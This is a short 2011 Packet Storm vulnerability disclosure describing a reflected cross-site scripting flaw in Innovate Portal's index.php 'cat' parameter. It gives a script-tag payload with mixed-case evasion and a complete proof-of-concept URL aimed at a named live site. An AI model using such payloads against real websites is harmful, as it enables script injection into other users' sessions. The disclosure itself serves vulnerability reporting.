Innovate Portal Cross Site Scripting

2011-10-19T00:00:00
ID PACKETSTORM:105997
Type packetstorm
Reporter Eyup CELIK
Modified 2011-10-19T00:00:00

Description

                                        
                                            `# Exploit Title: Innovate Portal XSS Vulnerability  
# Date: 2011  
# Author: Eyup CELIK  
# Version: All Version  
# Tested on: All versions are Vulnerability  
# Web Site: www.eyupcelik.com.tr  
  
  
ISSUE  
  
XSS can be done using the command input  
  
Vulnerable Page:  
index.php  
  
Example:  
index.php?cat=<XSS   
Code>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound  
  
  
Exploit:  
index.php?cat='"()%26%251<ScRiPt   
>prompt(948044)<%2fScRiPt>&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound   
  
  
POC:  
http://www.innovate-board.de/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound  
  
  
  
Thanks,  
  
Eyup CELIK  
Information Technology Security Specialist  
http://www.eyupcelik.com.tr  
  
`